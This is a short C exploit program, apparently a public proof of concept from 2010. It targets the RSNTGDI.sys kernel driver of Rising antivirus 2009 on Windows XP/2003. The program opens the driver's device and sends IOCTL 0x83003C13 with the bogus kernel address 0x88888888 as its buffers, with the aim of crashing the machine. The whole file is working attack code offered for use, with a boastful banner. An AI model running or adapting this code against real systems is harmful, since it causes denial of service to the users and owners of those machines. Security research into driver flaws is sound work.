/*
On the net.We can found these file has published a BUG.In that.The BUG has found in CONTROL CODE:0x83003C0B.So.I check these file
in othere CONTROL CODE.Just for fun.....# Exploit Title: [Rising RSNTGDI.sys Local Denial of Service(CONTROL CODE:83003C13) ]# Date: [2010.11.1]# Author: [ ze0r ]# Version: [Rising 2009.Publish Date:2009.10.13.]# Tested on: [Windows XPSP3 Chinese Simplified & Windows 2003 Chinese Simplified]*/#include "stdio.h"#include "windows.h"
HANDLE DriverHandle =0;
void boom(PVOID systembuffer,PVOID userbuffer){
printf("userbuffer Is:%p\n\n",userbuffer);
printf("The systembuffer Is:%p\n\n",systembuffer);
DeviceIoControl(DriverHandle,
0x83003C13,
systembuffer,
20,
userbuffer,
20,(DWORD *)0,
0);return;}
int main(int argc, char* argv[]){
printf("-------------------------------------------------------------------------------\n");
printf("---------------------------C0ed By:ze0r,Let's ROCK!!---------------------------\n");
printf("----------------------------------QQ:289791332---------------------------------\n");
printf("-------------------------------------------------------------------------------\n\n");
DriverHandle=CreateFile("\\\\.\\rsntgdi",
0,
FILE_SHARE_READ | FILE_SHARE_WRITE ,
0,
OPEN_EXISTING,0,0);if(DriverHandle == INVALID_HANDLE_VALUE){
printf("Open Driver Error!\n\n");return 0 ;}
printf("OK.Let's Crash It!\n\n");
getchar();
boom((PVOID)0x88888888,(PVOID)0x88888888);return 0;}
